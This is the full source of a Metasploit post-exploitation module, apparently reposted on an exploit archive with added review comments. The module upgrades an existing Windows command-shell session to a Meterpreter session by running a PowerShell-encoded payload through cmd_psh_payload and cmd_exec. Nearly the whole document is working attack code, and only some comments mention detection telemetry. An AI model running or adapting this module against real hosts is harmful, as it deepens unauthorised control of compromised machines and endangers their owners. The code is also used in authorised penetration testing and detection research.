Windows Command Shell Upgrade (Powershell)



EKU-ID: 3809 CVE: OSVDB-ID:
Author: Ben Campbell Published: 2014-02-11 Verified: Verified


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

# Local module that takes an already-established Windows command-shell session
# and runs the configured payload through PowerShell in order to obtain a
# Meterpreter session on the same host.
#
# Review notes:
# - 'SessionTypes' restricts the module to 'shell' sessions, so it operates on
#   access that already exists; no vulnerability identifier is referenced here.
# - The only precondition checked is that powershell.exe exists under
#   %WINDIR%\System32. Hosts where PowerShell is absent are reported as
#   NotVulnerable.
# - cmd_psh_payload is provided by Exploit::Powershell (not shown here) and
#   presumably returns a powershell.exe command line carrying the payload —
#   confirm against the mixin. If so, process-creation auditing with command
#   lines and PowerShell logging are the relevant telemetry for a shell
#   spawning powershell.exe in this way.
class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Exploit::Powershell
  include Post::File

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the caller, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => 'Windows Command Shell Upgrade (Powershell)',
        'Description'    => %q{
          This module executes Powershell to upgrade a Windows Shell session
          to a full Meterpreter session.
        },
        'License'        => MSF_LICENSE,
        'Author'         => ['Ben Campbell <eat_meatballs[at]hotmail.co.uk>'],
        # WfsDelay is a framework option; presumably the number of seconds to
        # wait for the new session to arrive — confirm against the framework.
        'DefaultOptions' => { 'WfsDelay' => 10 },
        # NOTE(review): looks like a placeholder date rather than a real
        # disclosure — confirm.
        'DisclosureDate' => 'Jan 01 1999',
        'Platform'       => ['win'],
        'SessionTypes'   => ['shell'],
        'Targets'        => [['Universal', {}]],
        'DefaultTarget'  => 0
      )
    )
  end

  # Checks for the PowerShell binary on the target and, when present, executes
  # the payload command line in the existing shell session.
  #
  # Fails with Exploit::Failure::NotVulnerable when powershell.exe is not found
  # at the expected System32 location.
  def exploit
    # Windows PowerShell installs under the "v1.0" directory regardless of the
    # engine version, so a single path check is used for every release.
    powershell_exe = "%WINDIR%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"

    unless file?(powershell_exe)
      return fail_with(Exploit::Failure::NotVulnerable, "No powershell available.")
    end

    print_status("Executing powershell command line...")
    launch_command = cmd_psh_payload(payload.encoded)
    cmd_exec(launch_command)
  end

end